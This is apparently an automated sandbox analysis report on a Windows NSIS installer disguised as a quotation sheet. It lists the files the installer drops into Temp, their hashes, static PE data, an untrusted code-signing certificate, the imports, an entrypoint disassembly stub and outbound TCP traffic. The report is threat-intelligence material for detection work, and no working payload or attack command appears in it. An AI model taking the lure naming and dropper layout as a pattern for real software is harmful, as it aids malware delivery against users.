                                                                              Preview:.........................................______.........}..A.......UU..............UUU.,,................I....22......................b..................................___..B.......PPPP....~~.......////........ZZ...bbb.>>.....-...((.........``..............Z.O...HH............mmmmmm..]]].......ccccccc.........JJ........u.)....{{{{............f.....6........^^......U..|......=......}}}..............XXX.........<<<<<...................f........."""............KK.HHH..........................................F.................Z.........TT.UU...........VV.........dd.V...........[........}}......L.................................L..............k.......DDD...................... ..S.....XEa1........^-8D...f!...X..........M.........3..f..........8.......S.......X....................O...f.......:...j.....w.LWf.........fFf........."Mmf.........(....,...F.T...f..f...f...1.f.................f.............."...|..........4....%.......[t.........@Lmf!.f......[f.......P.{..........f!..

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\flyvesprings.afl

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):206364
                                                                              Entropy (8bit):1.2628204353333041
                                                                              Encrypted:false
                                                                              SSDEEP:768:ZA50xvMWCWcud/wYE7p7I6vi07muXRIqCBIjswyYLdzFcDMrmksocCVjBeVVoW4O:r7WVNhmKCVJZd
                                                                              MD5:7F52A962B3B5AAC02D5CD0209E3B144B
                                                                              SHA1:888E7656A230C23E3244C7E3C70DAE783C7BB6EB
                                                                              SHA-256:58207F67AEC92E2761E63F18230DEEDDDF6220967DEC97366153AE0DA1FB099A
                                                                              SHA-512:25DF4136AAEB35AE3EB9A3453510CF0D0E68FA1CD50D62D3CC8253F042306C96731FC745D90EC02F856548E49CD2C550D41EB73B674BE1EB84FF8C9E4F5CF674
                                                                              Malicious:false
                                                                              Preview:.....................@.l...................................................................................................O........~..........................................I......................c........._....................................................................................r..........F.................................................t....".....................c...B.....3..2..................................v5................+.............7.....=..............................................................o............................................"_............................X........V........;...h...................................................................z..................................................................................................@.................................@.................L......s................=....w.............n....................................R.................................................D?......................

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\halid.pre

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):588680
                                                                              Entropy (8bit):1.2508475671741555
                                                                              Encrypted:false
                                                                              SSDEEP:1536:4DQsKOvC67yLN4LsH1rsLkM83TRpPYu2fewLx6j773Hek2C1NRI6apWIT:WQX4499DPYXfB6feINqfWIT
                                                                              MD5:C57C7EA70544ABC867F12AA26079B31A
                                                                              SHA1:DF41E9E12110B8502C494A56797F4267F455846C
                                                                              SHA-256:5B6CCEFAFE9BA6599A43E50E029A43DEFA42A987E54DED8B1CE0A570F822ED68
                                                                              SHA-512:A6DC8FE158BFD93E04FC20FBB57627D4380C418636F7E52B1A4AF6BBB07EF00053750F640416317100B753496D1E11F41ABEC3C49F5800E0A78BBBC2867A793E
                                                                              Malicious:false
                                                                              Preview:...................................}........................................................................................................................T.........................................................................m..............S.9............................\................................_.........................................`.........H................&..........?........................=...G...................<....................q........v............H.....................................................................7..................J................6..............n......................e.................................5...........h.....................6...Y.................K.....................................................................................................................................".....Z.W..%...............*....M.....................................P.........................=.....................................................

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\indgives.ton

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):344232
                                                                              Entropy (8bit):1.254493541267648
                                                                              Encrypted:false
                                                                              SSDEEP:768:ZRFBvSEeIfI+jhAp/TBFv1B0BzwSpqSZqvpLpOvDWxuc6NPapZKZjF4vWlBs87Y7:BFjmp7X0XpI9Daip8rm48+23XPz1a2
                                                                              MD5:761EC0683CA47C3BB4D3C4AF622644A7
                                                                              SHA1:57CD94F92B74A9AC54C2CCE6ABCE67CE20DFF5CD
                                                                              SHA-256:E6535A5C8A3321B1212687AB850DA5698EBC673B8E6D6D2516573477E64F3811
                                                                              SHA-512:6759610803BD9D55F72E56AB229F397D9E9DEFBB0F18213EB3032A35EF9C30092B271C23FB6E4D476279C6F7B3E438067C1740FBE22C26EBAAB08C9AC9EE79E2
                                                                              Malicious:false
                                                                              Preview:A.......................................................................1.................................................................................5..............................G......................B.........:......c.............R...............p.............. ....n.........................0............P..................(....`............................k..............$.........................t...@............C.......................................e...............,....>......l....`..........................e.....M......Hx......................................C........................1........... ...............;...................Z...............B......................).........................g................:....E.............a.................N..,...........................n..=.....^..............................................C............................v.....................................A.....E...........................%...<l....................................

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\jf.can

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):581301
                                                                              Entropy (8bit):1.2594641165832554
                                                                              Encrypted:false
                                                                              SSDEEP:768:7rupsSYNpmpQVMQnP/BMsr/uDEvzM7ziWxw+Ol/f3uEJPzuzFDBMuT00m/X7XWFZ:7+HpJ5QoROK3V1dYARYA4UGqz/h6q
                                                                              MD5:73AA71573572EA83DD24EAD3D6B59C1E
                                                                              SHA1:9981C6A285C5A481C641F5C5ED2D93D69C72A96A
                                                                              SHA-256:3BF351ED62782F6625C87E0F47C81F9F72F5533FC3768043AF403E5D1DCA4941
                                                                              SHA-512:B8A5CC6BB7524E1341ACB6119EC41A22A9610E0E8226AB7A37CA77F3C30A3E9B873EE64F770C6B44E1D9767399EADBB485CF80602AA2624456FB90A532C7850E
                                                                              Malicious:false
                                                                              Preview:...............e.............................................................. .....................................3..............................................)........................ ..................................h............................................................................y..........\...........[.................................ws................|................................................g.......................................|.,............................................................................F........2............ ............................................................................................................................................................b..........................................N....................................................................P...............................................`.......................%..................}.........................................................................

                                                                              C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\kileskriften.kom

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):232808
                                                                              Entropy (8bit):1.2556661242362008
                                                                              Encrypted:false
                                                                              SSDEEP:1536:N+we1H9s03v/TTDeoOwB5/x9Bb6Al2Bld:N+we9vrTGwf8+g7
                                                                              MD5:36AD39699D00721662CFE9AB72D42009
                                                                              SHA1:F116D6F8CEE991DC10B529A9FE7700FA53F1A1F8
                                                                              SHA-256:793778370E425C06D61FBE536EB8336AB72ABBC7BF4BA828E1F28EEA2C73953B
                                                                              SHA-512:2337ED4C7A26DCCDF2710930EA93591DE9F965C9C86B8454A12FB56E389FE7A73FDCCBA9A2C2C4099EE0A1F9B3683A6D4493F85AB87AB31ECA5AD8FE023D6D5F
                                                                              Malicious:false
                                                                              Preview:.......................................................f......*.............................W............................................................@............d............................................A.........E...............).....................O..................................................................\.....................................`......0...........................I.................................................................o......j..................C...................i....................G.........................$.....................%....u....................A..........B...................._............................................2.................................................................................................................................................................^.............B........8..............................................................2.......2...=../....................................+...............

                                                                              C:\Users\user\AppData\Local\Temp\nsa9B23.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3792017
                                                                              Entropy (8bit):1.6735737622723097
                                                                              Encrypted:false
                                                                              SSDEEP:12288:wtRlVKGQL5yc/pJrIISuv2jZdMqfC/WYps4GXksRqZvb:VGGUWIIv2jZdJfC//PGXksRmvb
                                                                              MD5:593438012F454BD48F1B722D38AA0F2D
                                                                              SHA1:71AFCE9608A0F93DA5896BE4863D9AAE298C0A6A
                                                                              SHA-256:4134FBAFDB523ACEAE1947D35B27987EDF59EED284ABF7D988DECD3B74C689FF
                                                                              SHA-512:D4E4BFF8857081D994E9950EC43B4E30BFAC3E4966E9AA39A11D7D62E571D636AEF70097E10D4F63579FBB5AD605249F3C5420D57CA04D256A54920AD511F4B4
                                                                              Malicious:false
                                                                              Preview:........,...................~...............................................J...............................................................................................................................................................................................................a...{...............j...................................................................................................................................................d...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):11264
                                                                              Entropy (8bit):5.770824470205811
                                                                              Encrypted:false
                                                                              SSDEEP:192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
                                                                              MD5:B8992E497D57001DDF100F9C397FCEF5
                                                                              SHA1:E26DDF101A2EC5027975D2909306457C6F61CFBD
                                                                              SHA-256:98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
                                                                              SHA-512:8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: CdB3FZ9vyI.exe, Detection: malicious, Browse
                                                                              • Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious, Browse
                                                                              • Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious, Browse
                                                                              • Filename: Nondesistance.exe, Detection: malicious, Browse
                                                                              • Filename: Nondesistance.exe, Detection: malicious, Browse
                                                                              • Filename: Platosammine.exe, Detection: malicious, Browse
                                                                              • Filename: FRA.0038222.exe, Detection: malicious, Browse
                                                                              • Filename: Platosammine.exe, Detection: malicious, Browse
                                                                              • Filename: FRA.0038222.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....z.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\nsExec.dll

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6656
                                                                              Entropy (8bit):4.994709916818556
                                                                              Encrypted:false
                                                                              SSDEEP:96:kD7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNe43e:kPXhHR0aTQN4gRHdMqJVgNef
                                                                              MD5:AE164B9DD3591A987B0D71DC255C4654
                                                                              SHA1:41198CB28A31A0FFC3D14540E61A4840800681CC
                                                                              SHA-256:7FAFAF28FA6EB7604C61EF816CDD3E5097A0E17695BEF0BF9116B6558AA68967
                                                                              SHA-512:57FAD70B175FA4F1A525FE413C8BCD87CD66B97053056C91CA912E6796AD19CC613437F49C52ADF5CA20C2C54F4C0EF2A41DF50CFABE0645DE7E6016B5CD05F6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious, Browse
                                                                              • Filename: z65PurchaseOrderNo_0072024_pdf.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.10132.22073.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.16795.26223.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.19295.24537.exe, Detection: malicious, Browse
                                                                              • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.10604.26230.20747.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.737887650723092
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:z1QuotationSheetVSAA6656776.exe
                                                                              File size:1'009'096 bytes
                                                                              MD5:cfb41760f84e1e70bade0ca7394d424b
                                                                              SHA1:139d1068c52255526ec38fe7ce0c48c365492712
                                                                              SHA256:a2be0d024f1ed07193631fd4bcf91b224685a2624a3396dedbed5d071c29889f
                                                                              SHA512:4e139676847190c84d85888dee0d2e00587179af2aef0e74ba007e772d45093116523ac1f294ad97a1c070633808f51807d4b52a9d2530a81f7e370ffe0949f9
                                                                              SSDEEP:24576:q/y/rgmCvgaqDn+gQ2XHDY3hCUsdiXdjwsTHvsqakWLCWQj:q/y/rgmx+gQy0xCUssX5wqvsDRCj
                                                                              TLSH:60251233BA2187B6DAAC4B35497A85248FA0EC733D71A31FBB08F6561F321F24419579
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....z.W.................^.........

                                                                              File Icon

                                                                              Icon Hash:051850d898713163

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x40322b
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x57017AAD [Sun Apr 3 20:18:53 2016 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:4f67aeda01a0484282e8c59006b0b352

                                                                              Authenticode Signature

                                                                              Signature Valid:false
                                                                              Signature Issuer:E=Sociocrat@Screwballs.Be, O=Resurges, OU="Trkgardiner Heteromastigate ", CN=Resurges, L=Denniston, S=Kentucky, C=US
                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                              Error Number:-2146762487
                                                                              Not Before, Not After
                                                                              • 23/06/2024 02:48:22 23/06/2027 02:48:22
                                                                              Subject Chain
                                                                              • E=Sociocrat@Screwballs.Be, O=Resurges, OU="Trkgardiner Heteromastigate ", CN=Resurges, L=Denniston, S=Kentucky, C=US
                                                                              Version:3
                                                                              Thumbprint MD5:47524D31775CB63F7BA06F3F807F1BC6
                                                                              Thumbprint SHA-1:E024E316DA4C8377688667F5BBECFD51E8826A71
                                                                              Thumbprint SHA-256:AC88AA71E85112494F127C4B14D5B661BF65EC7D5EAD358D3C27EB36C9E9BF7B
                                                                              Serial:7AD51E07EB00FA068078A5354208798EF1B97B71

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              sub esp, 00000184h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+18h], ebx
                                                                              mov dword ptr [esp+10h], 00409130h
                                                                              mov dword ptr [esp+20h], ebx
                                                                              mov byte ptr [esp+14h], 00000020h
                                                                              call dword ptr [00407120h]
                                                                              call dword ptr [004070ACh]
                                                                              cmp ax, 00000006h
                                                                              je 00007F7CB444C803h
                                                                              push ebx
                                                                              call 00007F7CB444F789h
                                                                              cmp eax, ebx
                                                                              je 00007F7CB444C7F9h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 00407298h
                                                                              push esi
                                                                              call 00007F7CB444F705h
                                                                              push esi
                                                                              call dword ptr [004070A8h]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], bl
                                                                              jne 00007F7CB444C7DDh
                                                                              push ebp
                                                                              push 00000009h
                                                                              call 00007F7CB444F75Ch
                                                                              push 00000007h
                                                                              call 00007F7CB444F755h
                                                                              mov dword ptr [00423724h], eax
                                                                              call dword ptr [00407044h]
                                                                              push ebx
                                                                              call dword ptr [00407288h]
                                                                              mov dword ptr [004237D8h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+38h]
                                                                              push 00000160h
                                                                              push eax
                                                                              push ebx
                                                                              push 0041ECF0h
                                                                              call dword ptr [00407174h]
                                                                              push 004091ECh
                                                                              push 00422F20h
                                                                              call 00007F7CB444F37Fh
                                                                              call dword ptr [004070A4h]
                                                                              mov ebp, 00429000h
                                                                              push eax
                                                                              push ebp
                                                                              call 00007F7CB444F36Dh
                                                                              push ebx
                                                                              call dword ptr [00407154h]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x330000x2a638.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xf5ba80xa20
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x5dc50x5e00a23d2965909b5f64725fd24c7252001bFalse0.6685089760638298data6.4711273116718715IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x70000x12460x14006389f916226544852e494114faf192adFalse0.4271484375data5.0003960999706765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x90000x1a8180x40072dcd89e8824ae186467be61797ed81eFalse0.6474609375data5.220595003364983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .ndata0x240000xf0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x330000x2a6380x2a800211c5a6f63a6a60eafa4bce2fdc2eb37False0.4163775275735294data5.182849595658975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x333a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3621495327102804
                                                                              RT_ICON0x43bc80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4262665545511877
                                                                              RT_ICON0x4d0700x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.452449168207024
                                                                              RT_ICON0x524f80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4430798299480397
                                                                              RT_ICON0x567200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5049792531120332
                                                                              RT_ICON0x58cc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5705909943714822
                                                                              RT_ICON0x59d700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6202025586353944
                                                                              RT_ICON0x5ac180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6536885245901639
                                                                              RT_ICON0x5b5a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7030685920577617
                                                                              RT_ICON0x5be480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.646889400921659
                                                                              RT_ICON0x5c5100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4884393063583815
                                                                              RT_ICON0x5ca780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7402482269503546
                                                                              RT_DIALOG0x5cee00x100dataEnglishUnited States0.5234375
                                                                              RT_DIALOG0x5cfe00x11cdataEnglishUnited States0.6056338028169014
                                                                              RT_DIALOG0x5d1000x60dataEnglishUnited States0.7291666666666666
                                                                              RT_GROUP_ICON0x5d1600xaedataEnglishUnited States0.632183908045977
                                                                              RT_MANIFEST0x5d2100x425XML 1.0 document, ASCII text, with very long lines (1061), with no line terminatorsEnglishUnited States0.5127238454288408

                                                                              Imports

                                                                              DLLImport
                                                                              KERNEL32.dllCopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                              USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                              ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 24, 2024 14:45:23.457614899 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.457716942 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.457973003 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.484133959 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.484200954 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.722317934 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.722604036 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.723567009 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.723805904 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.764831066 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.764846087 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.765212059 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.765367985 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.768213987 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.812176943 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.939868927 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.940100908 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:23.940159082 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.940504074 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.941981077 CEST49779443192.168.11.20142.251.167.113
                                                                              Jul 24, 2024 14:45:23.942049026 CEST44349779142.251.167.113192.168.11.20
                                                                              Jul 24, 2024 14:45:24.126992941 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.127088070 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:24.127343893 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.127521992 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.127578974 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:24.369595051 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:24.369852066 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.373439074 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.373471975 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:24.374152899 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:24.374396086 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.374764919 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:24.416279078 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.572643995 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.572887897 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.587168932 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.587497950 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.594717979 CEST44349780142.251.111.132192.168.11.20
                                                                              Jul 24, 2024 14:45:26.594991922 CEST49780443192.168.11.20142.251.111.132
                                                                              Jul 24, 2024 14:45:26.602318048 CEST44349780142.251.111.132192.168.11.20
